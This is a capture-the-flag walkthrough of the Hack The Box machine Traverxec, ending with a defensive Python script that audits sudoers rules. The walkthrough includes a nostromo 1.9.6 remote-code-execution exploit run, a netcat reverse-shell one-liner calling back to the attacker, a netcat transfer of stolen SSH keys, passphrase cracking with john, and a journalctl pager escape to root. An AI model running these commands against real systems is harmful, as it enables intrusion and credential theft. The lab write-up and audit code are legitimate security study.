Hackthebox Traverxec Walkthrough

In this article you will learn the following:
- Scanning targets using nmap
- Enumeration
- Exploiting nostromo 1.9.6
- Checking the nostromo configuration file
- Decrypting an SSH private key with john
- Abusing a sudo command for root
Port Scanning
$ nmap -Pn -sC -sV -v 10.10.10.165 -oN traverxec.nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Add the vhost to /etc/hosts:
10.10.10.165 traverxec.htb
I started by enumerating the web server with gobuster:
$ gobuster dir -u http://traverxec.htb/ -w /usr/share/wordlists/dirb/common.txt
/css (Status: 301)
/icons (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/lib (Status: 301)
Enumeration turned up nothing interesting, so I decided to search for exploits for nostromo 1.9.6 and found one:
https://www.rapid7.com/db/modules/exploit/multi/http/nostromo_code_exec
And on Exploit-DB:
https://www.exploit-db.com/exploits/47837
nostromo 1.9.6 – Remote Code Execution
CVE : CVE-2019-1627
I downloaded the exploit and ran it.

Then I ran the exploit again with a reverse shell:
python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9090 >/tmp/f"

The nostromo app lives in /var/nostromo and its config in /var/nostromo/conf, so I read nhttpd.conf.

There are three main things to look at in it:
serveradmin [email protected]
homedirs /home
homedirs_public public_www
After some digging it seemed there was a public folder named public_www in /home/david, so I tried to run ls on that path:
$ ls -al /home/david/public_www

And I got a result: there is a protected-file-area directory

containing a compressed SSH backup file:
backup-ssh-identity-files.tgz
So I moved it to my machine with netcat:
nc -lvp 9091 > backup-ssh-identity-files.tgz
nc 10.10.14.5 9091 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz


To decompress it:
$ gunzip -d backup-ssh-identity-files.tgz
$ tar xvf backup-ssh-identity-files.tar

Checking the SSH private key shows that it is encrypted.

So to decrypt it and recover the passphrase we need to run:
$ ssh2john id_rsa > david-ssh.key
$ john --wordlist=/root/Desktop/HTB/rockyou.txt david-ssh.key


I got the passphrase, then SSH'd in as user david and got the user flag:
$ ssh -i id_rsa [email protected]


After a little enumeration I found a bin directory in david's home containing server-stats.sh, and read it.

It seems david has a sudo rule for this command:
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
To check it, I ran the script; if it had asked for a password, the sudo rule would not be a valid (passwordless) one.

It ran normally, so I searched for journalctl and found a sudo privilege escalation on GTFOBins:
https://gtfobins.github.io/gtfobins/journalctl/
After a few tries I found the solution:
-n --lines[=INTEGER] Number of journal entries to show
If we make the terminal smaller than the length of the longest line, the output no longer fits on screen and journalctl drops into its pager; from there we can escape the restricted environment and get root privileges.
This invokes the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by spawning an interactive system shell
GTFOBins
So I tried it, and it worked: I got root privileges.
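A defender-side check for this class of misconfiguration, added here as an example and not part of the original writeup: it audits sudoers rules for commands such as journalctl that hand their output to a pager when it does not fit the terminal, and proposes the same rule with --no-pager pinned in it. The sudoers line it runs on is constructed to match the command shown above; the box's real sudoers file is not on the page.

```python
import re
import shlex

# Commands that hand output to a pager (less by default) when it does not fit
# the terminal; under sudo that pager runs as root and can spawn a shell.
PAGER_COMMANDS = {"journalctl": "--no-pager", "systemctl": "--no-pager"}

# user host=(runas) TAGS: cmd, cmd ...  (simplified sudoers grammar)
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sudoers line assumed to match the command in the walkthrough.
SAMPLE_RULE = "david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service"


def audit_rule(line):
    """Return one finding per pager-capable command in a sudoers rule ([] if clean)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    m = SUDOERS_RE.match(line)
    if not m:
        return []
    runas = m.group("runas") or "root"
    findings = []
    for cmd in m.group("cmds").split(","):
        cmd = cmd.strip()
        argv = shlex.split(cmd)
        if not argv:
            continue
        flag = PAGER_COMMANDS.get(argv[0].rsplit("/", 1)[-1])
        if flag and flag not in argv[1:]:
            findings.append({
                "user": m.group("user"),
                "command": cmd,
                "issue": f"{argv[0]} runs as {runas} and may open an interactive pager",
                # sudo matches arguments exactly, so pin the flag in the rule itself
                "fix": f"{m.group('user')} {m.group('host')}=({runas}) "
                       f"{m.group('tags')}{cmd} {flag}",
            })
    return findings


if __name__ == "__main__":
    for f in audit_rule(SAMPLE_RULE):
        print(f"[!] {f['user']}: {f['command']}\n    {f['issue']}\n    fix: {f['fix']}")
```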

Got the root flag.
That’s all folks , hope you enjoyed this writeup.